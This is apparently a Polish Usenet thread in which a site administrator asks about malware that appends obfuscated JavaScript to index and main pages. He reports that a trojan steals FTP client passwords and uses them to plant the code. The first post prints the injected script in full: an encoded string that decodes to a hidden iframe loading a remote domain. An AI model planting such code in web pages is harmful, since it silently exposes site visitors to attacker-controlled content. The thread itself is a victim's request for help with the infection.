Witam,

czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
dokleja zdalnie nastepujacy kod javascript do stron o nazwie
index.php, index.html, main.html, main.php

-- kod --

<!-- ad --><script language="JavaScript">function rkfg(jflq){return
String.fromCharCode(jflq);}var
ohhe="0601051021140971091010321151140990610391041161
1611205804704711511711210111410511111409710012204610
5110102111047111112105115047063116061049051039032119
1051001161040610390480390321041011051031041160610390
4803903211511612110810106103911810511510509810510810
5116121058032104105100100101110059039062060047105102
114097109101062";var
ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=r
kfg(ohhe.substr
(qhxk, 3));}window.status='Done';document.write(ifdm);</scr
ipt>
<!-- /ad -->

-- kod --

w/w kod tworzy ukryta iframe i laczy sie z adresem http://superioradz.info/opis/?t=13

--
Matt Rutkowski

do góry

Matt Rutkowski wrote:

> czy ktos spotkal sie z mallware ktore w nieznany mi dotad sposob
> dokleja zdalnie nastepujacy kod javascript do stron o nazwie
> index.php, index.html, main.html, main.php

A dokleja dokladnie do plikow tresci statycznej strony, czy moze
raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.

A w ogole to pl.comp.security ?



--

tajemnicze kręgle w zbożu

do góry

> A dokleja dokladnie do plikow tresci statycznej strony, czy moze
> raczej dynamicznie generowanego outputu? Hint: Cross Site Scripting.

- trojan ktory wykrada hasla z popularnych klientow ftp i kolejno
laczy sie ze strona doklejajac do plikow o nazwie index.php,
index.html, main.php, main.html statycznie generowany content (kod w
mailu wyzej)

- dal sie zauwazyc z racji, ze wielu klientow uzywa szablonow html
smarty; doklejenie kodu js w niewlasciwym miejscu powoduje uwalenie
strony


--
Matt Rutkowski

do góry